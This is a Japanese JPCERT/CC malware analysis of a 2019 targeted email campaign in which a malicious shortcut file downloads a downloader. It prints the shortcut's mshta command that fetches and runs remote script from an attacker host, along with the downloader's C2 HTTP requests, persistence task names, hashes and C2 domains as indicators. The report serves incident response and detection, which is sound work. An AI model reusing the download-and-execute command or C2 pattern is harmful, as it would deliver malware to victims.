マルウエアが含まれたショートカットファイルをダウンロードさせる攻撃

2019年4月から5月にかけて、日本の組織に対して、不正なショートカットファイルをダウンロードさせようとする標的型攻撃メールが送信されていることを確認しています。これらの標的型攻撃メールにはリンクが記載されており、クリックするとクラウドサービスからショートカットファイルがダウンロードされます。このショートカットファイル内にはダウンローダが含まれており、ショートカットファイルを実行することによって動作します。

今回は、この最近確認された検体の詳細について紹介します。

ダウンローダが動作するまでの流れ

以下は、ショートカットファイル実行からダウンローダが感染するまでの流れを示しています。

図 1:ショートカットファイルからダウンローダが感染するまでの流れ

JPCERT/CCで確認しているショートカットファイルは、以下のようなコードが含まれており、実行すると外部からVBScriptを含むHTMLファイル(図2)をダウンロードします。このVBScript によってVBSファイル(stwa.vbs)とBATファイル(Autorun.bat)が作成され、実行されます

/c start /MIN %windir%\system32\mshta.exe http://pact.vgmtx.com/58l1hq/76pcik.php &ping 127.0.0.1&taskkill /f /im mshta.exe&%tmp%\Autorun.bat

図 2:ショートカットファイルがダウンロードするHTMLファイル

実行されたstwa.vbsは、ショートカットファイル内に含まれるBase64されたデータ(図3)をデコードし、Windows実行ファイル(stwa.exe)および表示用のダミーWordファイルとして保存します。

図 3:ショートカットファイルに含まれるBase64データ

stwa.exeは自己解凍形式(CAB)になっており、実行すると表1のファイル群を作成します。stwa.exeが作成するsrdfqm.exeが、通信などのメインの挙動を行うダウンローダです。

表 1: stwa.exeが作成するファイル群

ファイル名 詳細
srdfqm.exe ダウンローダ
cp_cdis32.exe srdfqm.exeを%APPDATA%\Microsoft\に保存
sd.exe winpt.xmlおよびwinpt_n.xmlをタスク登録
winpt.xml タスクXMLファイル ※
winpt_n.xml タスクXMLファイル ※

※ 作成されるタスクに関しては、Appendix Bをご覧ください。

srdfqm.exeの詳細

このマルウエアはダウンローダであり、それ以外の機能はありません。実行されると以下のような通信を行います。最初のリクエストでは、ダウンロードするファイルの名前を入手します。

GET /XwuM6u/edgeside.php
Host: monday.reuqest-userauth.com
Accept-Encoding: identity

2回目の通信では、1回目の通信で得られたファイル名をURLに含めて通信を行い、ダウンロードしたファイルを保存します。

http://monday.reuqest-userauth.com/XwuM6u/jf80/[ファイル名]

ダウンロードが成功した場合は、以下のように3回目の通信を行います。

http://monday.reuqest-userauth.com/XwuM6u/around.php

なお、このマルウエアは以下のコードの一部を使用して作成されたと考えられます。
http://scumways.com/happyhttp/happyhttp.html

現在のところ、このマルウエアがダウンロードする検体を取得できていないため、最終的にどのようなマルウエアが感染するか不明です。

おわりに

このようなショートカットファイルを攻撃の起点として使用するものは多数確認されていますが、毎回少しずつ手法を変えているようです。今後も同様の標的型攻撃が行われる可能性があるため、注意が必要です。
今回解説した検体が感染した際に作成されるタスクの情報はAppendix Bに記載しています。また、JPCERT/CCで確認している本件の通信先の一部はAppendix Dに記載していますので、このような通信先にアクセスしている端末がないかご確認ください。

インシデントレスポンスグループ 朝長 秀誠、高橋 渉

Appendix A: ショートカットファイルの情報

表 2: ショートカットファイルに含まれる情報

項目 内容
Drive serial number d0e3-15e3
NetBIOS name win-j1m3n7bfrbl
MAC address 00:0c:29:81:1b:f9

Appendix B: 登録されるタスクの情報

表 3: 登録されるタスク情報1

項目 内容
名前 WinPcapUpdt
作成者 MSS_Local
プログラムの開始 %APPDATA%\Microsoft\srdfqm.exe

表 4: 登録されるタスク情報2

項目 内容
名前 WinPcapUpdt_n
作成者 MSS_Local_PR
プログラムの開始 %APPDATA%\Microsoft\Network\lqm_gt.exe

Appendix C: 検体のSHA-256ハッシュ値

  • cd431575e46b80237e84cc38d3b0bc6dcd676735c889539b5efa06cec22f0560
  • 128f1af38e8e6075884e32c479b3fc984b80b774cea5a5c55b1a8929ae16694c
  • 26a01df4f26ed286dbb064ef5e06ac7738f5330f6d60078c895d49e705f99394
  • c232be4661e6ba1c1823f3406896d1e53ac9697943b19b14de50e45e600d4243
  • 284210262b353d8e80d708c008a17e79c61311098e3d089f8a37756c206933ea
  • fb8b220920281d8e7e12c4d76839fd07737eb3008af793a69c496f061d98326d
  • bf45cecd4368c7c9320804cdda5fd660e2485957178361995eaa4adddf12dcd9
  • 94714816aaa2a1a4390e5b613936bb0849de79c3ffdec2cd03c2cd55029a22cd
  • b2c9b31a305c1ce0c316a6896a558d51094349397fff9dad886c13d935f7a2eb
  • ed50f748066ef6c317e4ce48aab9d338c139aa3f707f69b239b75af120f49de1
  • 45104b0efd653e1c928deaae952882b80dbb044a6a11f5972a1b326a4d3d4551
  • 40b43d752f8dc1a10df4abceb7a18062a0072b9dc0834f33d32ab60a0cf8b075
  • ab2273b019f7a2dda764e1de760753364924f9efd4107ee613d89054a3292991
  • b9c476f8a0bf2d334f05f8b4831ca528adfdafaceb72fa8be5cfe78086409dd5
  • fac968a2b1736502c96872f4996194d580102a7312c4e8efac8caf3003c630bf
  • b7f9997b2dd97086343aa21769a60fb1d6fbf2d5cc6386ee11f6c52e6a1a780c

Appendix D: 通信先一覧

  • tulse.vgmtx.com
  • monday.reuqest-userauth.com
  • pact.vgmtx.com
  • market.pwsmbx.com
≪ 前へ
トップに戻る
次へ ≫